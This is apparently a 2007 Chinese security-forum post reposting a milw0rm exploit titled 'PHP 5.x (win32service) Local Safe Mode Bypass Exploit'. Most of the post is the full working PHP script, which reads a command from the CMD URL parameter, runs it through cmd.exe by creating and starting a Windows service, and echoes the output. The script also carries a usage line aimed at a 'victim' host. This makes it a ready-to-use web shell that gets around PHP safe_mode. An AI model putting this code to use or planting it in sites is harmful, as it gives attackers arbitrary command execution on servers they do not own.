PHP 5.x (win32service) Local Safe Mode Bypass Exploit

ring04h

团队执行官

Rank: 8 Rank: 8

E.S.T核心成员社区主管

帖子: 3923
精华: 128
积分: 209640
阅读权限: 200
性别: 男
在线时间: 1096 小时
注册时间: 2007-10-23
最后登录: 2008-7-23

资料收集奖运营支持奖

发短消息
加为好友
当前离线

楼主大中小发表于 2007-8-12 12:51 只看该作者

PHP 5.x (win32service) Local Safe Mode Bypass Exploit

复制内容到剪贴板

代码:

<?php



#####################################################

### PHP Safe_mode bypass exploit (win32service)  ###

###                        ###

### Note: Tested on 5.2.1             ###

###                        ###

### Author: NetJackal              ###

### Email:  nima_501[at]yahoo[dot]com      ###

### Website: [url]http://netjackal.by.ru[/url]        ###

###                        ###

###                        ###

### Usage: [url]http://victim.net/nj.php?CMD=[/url][command] ###

#####################################################



$command=(isset($_GET[&#39;CMD&#39;]))?$_GET[&#39;CMD&#39;]:&#39;dir&#39;; #cammand

$dir=ini_get(&#39;upload_tmp_dir&#39;); #Directory to store command&#39;s output



if(!extension_loaded(&#39;win32service&#39;))die(&#39;win32service extension not found!&#39;);

$name=$dir."\\".uniqid(&#39;NJ&#39;);

$n=uniqid(&#39;NJ&#39;);

$cmd=(empty($_SERVER[&#39;ComSpec&#39;]))?&#39;d:\\windows\\system32\\cmd.exe&#39;:$_SERVER[&#39;ComSpec&#39;];

win32_create_service(array(&#39;service&#39;=>$n,&#39;display&#39;=>$n,&#39;path&#39;=>$cmd,&#39;params&#39;=>"/c $command >\"$name\""));

win32_start_service($n);

win32_stop_service($n);

win32_delete_service($n);

$exec=file_get_contents($name);

unlink($name);

echo "<pre>".htmlspecialchars($exec)."</pre>";

?>



# milw0rm.com [2007-07-27]

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » PHP 5.x (win32service) Local Safe Mode Bypass Exploit